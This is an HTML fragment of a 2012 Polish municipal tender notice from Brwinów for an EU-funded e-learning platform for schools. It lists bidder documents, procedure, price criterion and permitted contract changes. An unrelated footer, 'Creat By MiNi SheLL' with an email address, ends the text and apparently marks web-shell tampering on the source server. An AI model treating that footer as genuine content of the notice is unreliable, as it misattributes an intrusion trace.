<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2)	zmiany podmiotu trzeciego (podwykonawcy), na którego zasobach Wykonawca potwierdził spełnianie warunków udziału w postępowaniu o udzielenie niniejszego zamówienia publicznego, a nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca, 
3)	zmiany podwykonawców lub zakresu usług wykonywanych przez podwykonawców zgłoszonych przez Wykonawcę,
4)	w przypadku konieczności zmiany osoby wykonującej obowiązki moderatora forum dyskusyjnego dla każdego ze wskazanych przedmiotów kursu, za zgodą Zamawiającego,
5)	zmian w zakresie liczebności poszczególnych grup szkoleniowych,
6)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ,
7)	zmiana okresu realizacji umowy, o którym mowa w § 2 umowy, jest możliwa wyłącznie za zgodą obu stron umowy;
8)	w przypadku wystąpienia siły wyższej możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;
9)	w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;
10)	w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.brwinow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL.KOŚCIUSZKI 4A, Zespół ds. Zamówień Publicznych, pokój nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2012 godzina 13:00, miejsce: URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL.GRODZISKA 12, pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Uruchomienie i zapewnienie dostępu do platformy e-learningowej z gotowymi kursami z języka angielskiego, informatyki, matematyki w ramach zajęć pozaszkolnych wspierających naukę uczniów z dwóch szkół podstawowych, z dwóch szkół gimnazjalnych w ramach projektu Multimedialni uczniowie - zajęcia pozalekcyjne w systemie blended learningu i tradycyjnym dofinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
Projekt realizowany w ramach umowy nr UDA-POKL.09.01.02-14-079/10-00..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com